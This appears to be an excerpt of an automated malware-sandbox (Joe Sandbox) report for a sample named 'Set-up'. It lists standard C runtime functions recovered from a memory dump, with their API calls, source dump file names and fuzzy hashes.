                                                                                                • Part of subcall function 6BBA538C: __uncaught_exception.MSVCR100(?,?,?,?,6BB95C86,00000001), ref: 6BBA53A1
                                                                                                • Part of subcall function 6BBA5538: ??1_TaskCollection@details@Concurrency@@QAE@XZ.MSVCR100(?,?,00000001,?,?,6BBA542B,00000000,00000014,6BB962AC,?,00000000,?,6BBA4D05,00000001,00000000,?), ref: 6BBA5568
                                                                                                • Part of subcall function 6BBA5538: ??3@YAXPAX@Z.MSVCR100(?,?,?,00000001,?,?,6BBA542B,00000000,00000014,6BB962AC,?,00000000,?,6BBA4D05,00000001,00000000), ref: 6BBA556E
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2017067723.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2017015412.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017131595.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017160597.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017176492.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_6bb50000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: ??3@Concurrency@@$??1_??1event@Collection@details@Concurrency::unsupported_os::unsupported_osExceptionH_prolog3TaskThrow__uncaught_exception
                                                                                              • String ID:
                                                                                              • API String ID: 3788188742-0
                                                                                              • Opcode ID: 394fadeec9b22a49828a800c6f4313588a9245fa076b6af2ccbef48df25071dd
                                                                                              • Instruction ID: b51b66e1eace8c2783f66be79eec1251fa35da017ef87cd8f6c0eb50b5162183
                                                                                              • Opcode Fuzzy Hash: 394fadeec9b22a49828a800c6f4313588a9245fa076b6af2ccbef48df25071dd
                                                                                              • Instruction Fuzzy Hash: 95012231E453C08BDB18DA71C453B6E7379EF01768B84019CE2615B5A0EF7CEA0AC744
                                                                                              Function 6BB6A7FB Relevance: 9.1, APIs: 6, Instructions: 53COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __doserrno.MSVCR100(6BB6A880,00000010), ref: 6BB6A8A4
                                                                                              • __doserrno.MSVCR100(6BB6A880,00000010), ref: 6BB8F4DE
                                                                                              • _errno.MSVCR100(6BB6A880,00000010), ref: 6BB8F4E6
                                                                                              • _errno.MSVCR100(6BB6A880,00000010), ref: 6BB8F4FC
                                                                                              • _invalid_parameter_noinfo.MSVCR100(6BB6A880,00000010), ref: 6BB8F507
                                                                                              • _errno.MSVCR100(6BB6A880,00000010), ref: 6BB8F50E
                                                                                                • Part of subcall function 6BB6A5A9: EnterCriticalSection.KERNEL32(00000108,6BB6A610,0000000C,6BB7038E,?,6BB703C8,00000010,6BB889FE,?,00000000,00000002,?,6BC035D0,?,?), ref: 6BB6A5FA
                                                                                                • Part of subcall function 6BB6A78A: _get_osfhandle.MSVCR100(?,?,?,?,6BB6A865,?,6BB6A880,00000010), ref: 6BB6A795
                                                                                                • Part of subcall function 6BB6A78A: _get_osfhandle.MSVCR100(?), ref: 6BB6A7B8
                                                                                                • Part of subcall function 6BB6A78A: CloseHandle.KERNEL32(00000000), ref: 6BB6A7BF
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2017067723.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2017015412.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017131595.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017160597.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017176492.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_6bb50000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: _errno$__doserrno_get_osfhandle$CloseCriticalEnterHandleSection_invalid_parameter_noinfo
                                                                                              • String ID:
                                                                                              • API String ID: 1720121285-0
                                                                                              • Opcode ID: f29e53e27b85d71b6621403d7dab6be1cec94d4aefe262760a21bcd952bba868
                                                                                              • Instruction ID: 3cfe8be139f21cb03e06ffa4700953a5f3a9fd3598caea8dbe626053f288e0b4
                                                                                              • Opcode Fuzzy Hash: f29e53e27b85d71b6621403d7dab6be1cec94d4aefe262760a21bcd952bba868
                                                                                              • Instruction Fuzzy Hash: 7D1188318003A48FDB119F78C9C275C77A0AF423A9F650686D1349B2D1EBBC9E418EA1
                                                                                              Function 6BB6AC84 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • _getptd.MSVCR100(6BB6ACE0,0000000C,6BB6D0AA,?,?,6BB69233,?), ref: 6BB6AC90
                                                                                              • _lock.MSVCR100(0000000D), ref: 6BB6ACA7
                                                                                                • Part of subcall function 6BB60C43: EnterCriticalSection.KERNEL32(00000001,00000001,?,6BB621A9,0000000D), ref: 6BB60C5E
                                                                                              • InterlockedDecrement.KERNEL32(?), ref: 6BB6D0B7
                                                                                              • InterlockedIncrement.KERNEL32(013316E8), ref: 6BB6D0DF
                                                                                                • Part of subcall function 6BB6ACFC: _unlock.MSVCR100(0000000D,6BB6ACCF), ref: 6BB6ACFE
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2017067723.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2017015412.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017131595.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017160597.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017176492.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_6bb50000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: Interlocked$CriticalDecrementEnterIncrementSection_getptd_lock_unlock
                                                                                              • String ID:
                                                                                              • API String ID: 1606532611-0
                                                                                              • Opcode ID: 227090ef658c3bba5ffc8e3aa8e0284ffc1dd41fb1f0048325fbd9302b136c02
                                                                                              • Instruction ID: f6a70cf73add1ce96c8e5e1b89ffe3c9cc772344b7b5471786b399a4f9ee79cf
                                                                                              • Opcode Fuzzy Hash: 227090ef658c3bba5ffc8e3aa8e0284ffc1dd41fb1f0048325fbd9302b136c02
                                                                                              • Instruction Fuzzy Hash: B511CE32D55AA0DFCB109B359801B0D7370FB45B94F500146D4106B280FBBCAE828FE1
                                                                                              Function 6BB6A8DF Relevance: 9.0, APIs: 6, Instructions: 44COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __freebuf.LIBCMT ref: 6BB6A903
                                                                                                • Part of subcall function 6BB6A8AE: free.MSVCR100(?,?,?,6BB6A908,?,?), ref: 6BB6A8C5
                                                                                              • _fileno.MSVCR100(?,?,?), ref: 6BB6A909
                                                                                              • _close.MSVCR100(00000000,?,?,?), ref: 6BB6A90F
                                                                                              • _errno.MSVCR100 ref: 6BB88B94
                                                                                              • _invalid_parameter_noinfo.MSVCR100 ref: 6BB88B9F
                                                                                                • Part of subcall function 6BB6A665: _fileno.MSVCR100(?,?,?,?,?,?,?,6BB6A900,?), ref: 6BB6A694
                                                                                                • Part of subcall function 6BB6A665: _write.MSVCR100(00000000,?,?,?,?,?,?,6BB6A900,?), ref: 6BB6A69B
                                                                                              • free.MSVCR100(?), ref: 6BB88BB4
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2017067723.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2017015412.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017131595.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017160597.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017176492.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_6bb50000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: _filenofree$__freebuf_close_errno_invalid_parameter_noinfo_write
                                                                                              • String ID:
                                                                                              • API String ID: 1941134952-0
                                                                                              • Opcode ID: 0c03a7350c23a4a37fcfb518264520126cbcfc0aa4ba02ae4b539e9514dbc655
                                                                                              • Instruction ID: 7b50764f5274c3b55492a181edb8a81cd352eb6db6cbbb524cce6fb7aadecdf7
                                                                                              • Opcode Fuzzy Hash: 0c03a7350c23a4a37fcfb518264520126cbcfc0aa4ba02ae4b539e9514dbc655
                                                                                              • Instruction Fuzzy Hash: 57F0F422911BA01BCA10163A8C01B5E32989FC67F9F110614D928831D0F73CDD014FA0
                                                                                              Function 6BB78163 Relevance: 9.0, APIs: 6, Instructions: 38COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • _errno.MSVCR100 ref: 6BB7816A
                                                                                              • _errno.MSVCR100 ref: 6BB78171
                                                                                              • _wfullpath.MSVCR100(?,?,?), ref: 6BB78182
                                                                                                • Part of subcall function 6BB61E61: GetFullPathNameW.KERNEL32(?,?,00000000,?), ref: 6BB61EA6
                                                                                              • _errno.MSVCR100 ref: 6BB7818C
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2017067723.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2017015412.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017131595.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017160597.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017176492.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_6bb50000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: _errno$FullNamePath_wfullpath
                                                                                              • String ID:
                                                                                              • API String ID: 3755888649-0
                                                                                              • Opcode ID: 950bbb1dd7ff244681bc0fb5d5d64dd1d3882148739b8678b9520f6cb5eeacb3
                                                                                              • Instruction ID: 4f1a6577e243684d885f90684561f9c8b1365e9e44119067542714a0cc2c0147
                                                                                              • Opcode Fuzzy Hash: 950bbb1dd7ff244681bc0fb5d5d64dd1d3882148739b8678b9520f6cb5eeacb3
                                                                                              • Instruction Fuzzy Hash: 90F06D35210284AFCB121F76DC46B5D3B61EF867A5F4500B0E9185B220FB798C108FA1
                                                                                              Function 6BB6FB0D Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 206COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • _errno.MSVCR100(00000000,00000000,6BB65B65,?,000000BC,?,00000000,00000000,00000005), ref: 6BB75BD5
                                                                                              • _invalid_parameter_noinfo.MSVCR100(00000000,00000000,6BB65B65,?,000000BC,?,00000000,00000000,00000005), ref: 6BB8A1A9
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2017067723.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2017015412.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017131595.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017160597.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017176492.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_6bb50000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: _errno_invalid_parameter_noinfo
                                                                                              • String ID: $
                                                                                              • API String ID: 2959964966-3993045852
                                                                                              • Opcode ID: 0721cb7b740ccc7905d7e1efe5e54e964d3021557f7872640f4d53f6d2193e41
                                                                                              • Instruction ID: f0354f43988bee3a5af42de485a5caadbddcaff166710f7e0c3785309d4a9390
                                                                                              • Opcode Fuzzy Hash: 0721cb7b740ccc7905d7e1efe5e54e964d3021557f7872640f4d53f6d2193e41
                                                                                              • Instruction Fuzzy Hash: 38710130D496CACBDB25CF68C5903AE3BB1EF02794F2401AAD8605B1D0E37D9E91CB95
                                                                                              Function 6BB61AB5 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 178COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • iswctype.MSVCR100(?,00000008,?,?,?,?,?,?,6BB61BF0,?,?,?,00000000), ref: 6BB61AFE
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2017067723.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2017015412.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017131595.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017160597.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017176492.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_6bb50000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: iswctype
                                                                                              • String ID: $
                                                                                              • API String ID: 304682654-3993045852
                                                                                              • Opcode ID: 23aa5ff8b54acb0defe58cfe22a5ebab8b673f3305e6ff5540b35af7150fa1c6
                                                                                              • Instruction ID: 30b0b9c1bccba935ffe1f9eb843c8b1bca282c53bf8133faf1a0a61c80b66038
                                                                                              • Opcode Fuzzy Hash: 23aa5ff8b54acb0defe58cfe22a5ebab8b673f3305e6ff5540b35af7150fa1c6
                                                                                              • Instruction Fuzzy Hash: 7D51D3319042EADADF208F19C94539E37B4EF02B98F6C5296E824961D0F37C8E50CF51
                                                                                              Function 6BBA2A38 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 168COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ??_U@YAPAXI@Z.MSVCR100(00000000,?,00000000,00000000,?,?,?,?,?,?,?,6BB9D20F,?,00000000,00000000,?), ref: 6BBA2A6A
                                                                                              • ??_U@YAPAXI@Z.MSVCR100(00000000,?,00000000,00000000,?,?,?,?,?,?,?,6BB9D20F,?,00000000,00000000,?), ref: 6BBA2AF8
                                                                                              • ??_V@YAXPAX@Z.MSVCR100(?,?,?,00000000,00000000,?,?,?,?,?,?,?,6BB9D20F,?,00000000,00000000), ref: 6BBA2C4F
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2017067723.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2017015412.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017131595.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017160597.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017176492.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_6bb50000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: ,$,
                                                                                              • API String ID: 0-220654547
                                                                                              • Opcode ID: 03894b3d17109734d562bfcd162bd2f8fc99f3d3eba4bf352f169d5fa9c56562
                                                                                              • Instruction ID: 09af0c537f111129134cf32965daaf54d466c867e00ec0a9d8d1f5b7c05dd821
                                                                                              • Opcode Fuzzy Hash: 03894b3d17109734d562bfcd162bd2f8fc99f3d3eba4bf352f169d5fa9c56562
                                                                                              • Instruction Fuzzy Hash: 9761267190C7819FC728CF29C490A5BBBE2FF89304F544E5EE49A87291E774E941CB52
                                                                                              Function 6BB9C84D Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 86COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • EnterCriticalSection.KERNEL32(?), ref: 6BB9C85F
                                                                                              • LeaveCriticalSection.KERNEL32(?), ref: 6BB9C920
                                                                                              • SetEvent.KERNEL32(?), ref: 6BB9C92F
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2017067723.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2017015412.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017131595.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017160597.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017176492.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_6bb50000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: CriticalSection$EnterEventLeave
                                                                                              • String ID: $$,
                                                                                              • API String ID: 3094578987-53852779
                                                                                              • Opcode ID: 72a9c3cc64c6429d4ca86dd4ed7b90f87d7f1c8722d238685fe6db8ac0f18adb
                                                                                              • Instruction ID: 6fbcf0d208dc239058e7b0da06ac389629a5157b25f6dc6089628d5f28fe233d
                                                                                              • Opcode Fuzzy Hash: 72a9c3cc64c6429d4ca86dd4ed7b90f87d7f1c8722d238685fe6db8ac0f18adb
                                                                                              • Instruction Fuzzy Hash: 5E312270E0474AEFCB04EFA9D4C09AABBB1FF09300B1085ADD556A7611C335E985CFA0
                                                                                              Function 6BB68ED9 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 82COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2017067723.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2017015412.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017131595.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017160597.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017176492.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_6bb50000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: _errno_invalid_parameter_noinfo
                                                                                              • String ID: P
                                                                                              • API String ID: 2959964966-3110715001
                                                                                              • Opcode ID: b4594cfbb7066c9c193d30eb55ddf32ecdc70655408ba1b29cc7a16e5209f139
                                                                                              • Instruction ID: e0b88861c7023f1c9b72da3e010388c56540816f1f3559d5eda770f319a18457
                                                                                              • Opcode Fuzzy Hash: b4594cfbb7066c9c193d30eb55ddf32ecdc70655408ba1b29cc7a16e5209f139
                                                                                              • Instruction Fuzzy Hash: B32104322442C5DBDB215E6C8CC059DB7A6EB53794B200DABE664872C4F77CCC858F92
                                                                                              Function 6BB9B5D5 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 74COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • memcpy.MSVCR100(?,?,00000018), ref: 6BB9B5E4
                                                                                              • ??_U@YAPAXI@Z.MSVCR100(00000000,?,?,00000018), ref: 6BB9B5FD
                                                                                              • _memset.LIBCMT(00000000,00000000,?), ref: 6BB9B62E
                                                                                              • memcpy.MSVCR100(?,?,00000008), ref: 6BB9B654
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2017067723.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2017015412.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017131595.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017160597.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017176492.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_6bb50000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: memcpy$_memset
                                                                                              • String ID: ,
                                                                                              • API String ID: 2982297706-3772416878
                                                                                              • Opcode ID: ce875e42bf1f2ed31ba4c378de0ae8775ba556ddc7d3ab7dc834f6880682d53d
                                                                                              • Instruction ID: 361b38eb621a2f6f00d3cf37bd097492f85058f3f6b86eac488ff72397cb78ef
                                                                                              • Opcode Fuzzy Hash: ce875e42bf1f2ed31ba4c378de0ae8775ba556ddc7d3ab7dc834f6880682d53d
                                                                                              • Instruction Fuzzy Hash: CC21D572601B40AFD768DF28C996E6BF7E9EF84354F158529D00A8B251D678F841C750
                                                                                              Function 6BB6498E Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 51stringCOMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • strcat_s.MSVCR100(6BB65C30,6BB65C0F,6BB65C20,?,00000083,00000083,?,6BB65C24,6BB65C0F,6BB65C30,00000002,6BB65C30,6BB65C0F,?,00000000,00000000), ref: 6BB649AD
                                                                                              • __invoke_watson.LIBCMT(00000000,00000000,00000000,00000000,00000000,6BB65C0F,6BB65C30,00000002,6BB65C30,6BB65C0F,?,00000000,00000000,00000005), ref: 6BB90ACD
                                                                                              • __invoke_watson.LIBCMT(00000000,00000000,00000000,00000000,00000000), ref: 6BB90AD8
                                                                                              • _strcspn.LIBCMT(00000000,_.,,00000000,00000000,00000005), ref: 6BB90AE6
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2017067723.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2017015412.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017131595.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017160597.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017176492.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_6bb50000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: __invoke_watson$_strcspnstrcat_s
                                                                                              • String ID: _.,
                                                                                              • API String ID: 4004410220-2709443920
                                                                                              • Opcode ID: 766e146ed1fe45d45e7570a2a187947a03639e42e5fb0cd869641ca21cef2304
                                                                                              • Instruction ID: 11958980a2f67e2f4c17823721a7e67135204e7986401bdeb8f8ebe47fe96618
                                                                                              • Opcode Fuzzy Hash: 766e146ed1fe45d45e7570a2a187947a03639e42e5fb0cd869641ca21cef2304
                                                                                              • Instruction Fuzzy Hash: FFF0B433505289BB9B002E79AC8188F3B1AFE813BC721453AFE2851052E73DD9619B90
                                                                                              Function 6BB97406 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 51timeCOMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • CreateTimerQueue.KERNEL32(ECA782CA,?,00000000,ECA782CA,?,00000000,ECA782CA,00000000,6BB95CBE,6BB95C86), ref: 6BB9742E
                                                                                              • std::exception::exception.LIBCMT(6BB95C86,00000001,ECA782CA,?,00000000,ECA782CA), ref: 6BB97487
                                                                                              • _CxxThrowException.MSVCR100(ECA782CA,6BB6BDD8,6BB95C86,00000001,ECA782CA,?,00000000,ECA782CA), ref: 6BB9749C
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2017067723.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2017015412.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017131595.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017160597.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017176492.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_6bb50000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: CreateExceptionQueueThrowTimerstd::exception::exception
                                                                                              • String ID: bad allocation
                                                                                              • API String ID: 3396838967-2104205924
                                                                                              • Opcode ID: 91644e689f1ced72bb107cd41cb3b1734ba34668f8341af322ba439c4bbe47f0
                                                                                              • Instruction ID: 9856fd73ad2eba0b7d8d3fbe053c848feb991b46c1b3f445fd8416ac756544ff
                                                                                              • Opcode Fuzzy Hash: 91644e689f1ced72bb107cd41cb3b1734ba34668f8341af322ba439c4bbe47f0
                                                                                              • Instruction Fuzzy Hash: D511A070A042958BCB05EF6AD485A9E7BF4FB06744B111479E400D3300EB79DB40EBD1
                                                                                              Function 6BB6BAF9 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 42COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog3_catch.LIBCMT ref: 6BB6BB00
                                                                                              • _malloc_crt.MSVCR100(00000018,00000014,6BB6BB81,00000000,00000000), ref: 6BB6BB0D
                                                                                                • Part of subcall function 6BB60CD9: malloc.MSVCR100(00000001,00000001,00000001,?,6BB6AB90,00000018,6BB6AA18,0000000C,6BB874F7,00000001,00000001,?,6BB621A9,0000000D), ref: 6BB60CE5
                                                                                              • std::exception::exception.LIBCMT(?,00000001,00000014,6BB6BB81,00000000,00000000), ref: 6BB872C0
                                                                                              • _CxxThrowException.MSVCR100(6BB6BB81,6BB6BDD8,?,00000001,00000014), ref: 6BB872D5
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2017067723.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2017015412.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017131595.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017160597.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017176492.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_6bb50000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: ExceptionH_prolog3_catchThrow_malloc_crtmallocstd::exception::exception
                                                                                              • String ID: bad allocation
                                                                                              • API String ID: 2340149201-2104205924
                                                                                              • Opcode ID: 729223b3df68eff74393fc52cc526162991d3660bdfc451e714fe3635bcee568
                                                                                              • Instruction ID: c6cfd6ba9bf52a3cd26f539873b693695545e1dab3e9c5cc2c6aff93345a20bf
                                                                                              • Opcode Fuzzy Hash: 729223b3df68eff74393fc52cc526162991d3660bdfc451e714fe3635bcee568
                                                                                              • Instruction Fuzzy Hash: 8C015E75900288AEDB28DF64D843F9DBBB4EF08394F108059F104AF291EBB89D00CB60
                                                                                              Function 6BB6215F Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 40COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetModuleHandleW.KERNEL32(KERNEL32.DLL,6BB62200,00000008,6BB875E9,00000000,00000000), ref: 6BB62170
                                                                                              • _lock.MSVCR100(0000000D), ref: 6BB621A4
                                                                                                • Part of subcall function 6BB60C43: EnterCriticalSection.KERNEL32(00000001,00000001,?,6BB621A9,0000000D), ref: 6BB60C5E
                                                                                              • InterlockedIncrement.KERNEL32(?), ref: 6BB621B1
                                                                                                • Part of subcall function 6BB62228: _unlock.MSVCR100(0000000D,6BB621C3), ref: 6BB6222A
                                                                                              • _lock.MSVCR100(0000000C), ref: 6BB621C5
                                                                                              Strings
                                                                                              Memory Dump Source
